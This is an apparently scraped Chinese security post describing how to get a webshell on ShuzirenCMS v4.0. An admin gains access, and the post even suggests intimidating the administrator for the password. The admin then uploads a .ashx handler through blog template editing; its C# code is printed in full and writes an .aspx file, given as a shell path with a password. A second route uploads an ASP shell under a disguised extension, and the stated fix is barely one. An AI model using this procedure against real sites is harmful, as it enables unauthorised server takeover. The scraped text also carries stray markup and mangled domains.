好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

ShuzirenCMS v4.0 后台Get Shell及修复 - 网站安全 - 自学

简单看下… 发现Asp Php脚本权限封得死死的整个网站的目录任何一个都不给写入~ 测试环境/系统: 数字信息港内容管理系统ShuzirenCMS v4.0 / Windows 不管你社工,自己挖注入,嗅探,恐吓后台管理员要密码 反正要后台权限… 登入后台> 博客> 模板管理> 编辑 上传1.ashx 1.ashx内容: 1. 2. using System; 3. using System.Web; 4. using System.IO; 5. public class Handler : IHttpHandler { 6. public void ProcessRequest (HttpContext context) { 7. context.Response.ContentType = [text/plain]; 8. string show=]Hey web master,Have a nice day o.O? I hope so! HaHa]; 9. StreamWriter file1= File.CreateText(context.Server.MapPath([4z1.aspx])); 10. file1.Write(show); 11. file1.Flush(); 12. file1.Close(); 13. 14. } 15. 16. public bool IsReusable { 17. get { 18. return false; 19. } 20. } 21. 22. } 23. 复制代码 访问后生成的一句话路径:   http://HdhCmsTest2cto测试数据 /4z1.aspx   密码: RmB321654897123456789 另一个是如果asp权限可写文件 上传aasasa后缀的aspshell 漏洞 证明: haha1.jpg haha2.jpg HdhCmsTest2cto测试数据提供修复方案: 数字人就在我们公司本地,我们及时通知他。。。 站长 注意别泄露后台权限就完了  

查看更多关于ShuzirenCMS v4.0 后台Get Shell及修复 - 网站安全 - 自学的详细内容...

  阅读:71次